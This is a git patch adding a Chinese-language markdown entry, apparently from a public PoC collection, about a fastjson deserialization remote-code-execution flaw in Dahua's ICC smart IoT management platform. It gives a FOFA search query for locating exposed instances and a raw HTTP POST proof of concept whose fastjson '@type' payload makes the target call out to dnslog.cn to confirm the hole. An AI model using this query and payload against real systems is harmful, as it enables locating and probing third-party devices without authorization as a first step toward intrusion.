From cdee84a5141b1fddb53e09ae9db294535a7b0433 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 15 May 2024 08:50:28 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=A4=A7=E5=8D=8EICC=E6=99=BA?= =?UTF-8?q?=E8=83=BD=E7=89=A9=E8=81=94=E7=BB=BC=E5=90=88=E7=AE=A1=E7=90=86?= =?UTF-8?q?=E5=B9=B3=E5=8F=B0=E5=AD=98=E5=9C=A8fastjson=E6=BC=8F=E6=B4=9E.?= =?UTF-8?q?md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ICC智能物联综合管理平台存在fastjson漏洞.md | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 大华ICC智能物联综合管理平台存在fastjson漏洞.md diff --git a/大华ICC智能物联综合管理平台存在fastjson漏洞.md b/大华ICC智能物联综合管理平台存在fastjson漏洞.md new file mode 100644 index 0000000..41e3ccf --- /dev/null +++ b/大华ICC智能物联综合管理平台存在fastjson漏洞.md @@ -0,0 +1,33 @@ +## 大华ICC智能物联综合管理平台存在fastjson漏洞 + +大华ICC智能物联综合管理平台是专门为大华股份研发的一款物联网管理平台,它可以对多个智能设备和系统进行统一管理和控制,方便用户实时了解和管理各个设备和系统的状态。该平台提供了一系列的智能化功能,包括设备管理、监控预警、数据分析等,旨在为用户提供更加智能、高效和便捷的物联网管理体验,其使用了alibaba fastjson,存在反序列化漏洞导致RCE。 + +## fofa +``` +body="*客户端会小于800*" +``` + +## poc +``` +POST /evo-runs/v1.0/auths/sysusers/random HTTP/2 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Content-Type: application/json +Content-Length: 144 + +{ + "a":{ + "@type":"com.alibaba.fastjson.JSONObject", + {"@type":"java.net.URL","val":"http://dnslog.cn"} + }"" +} +```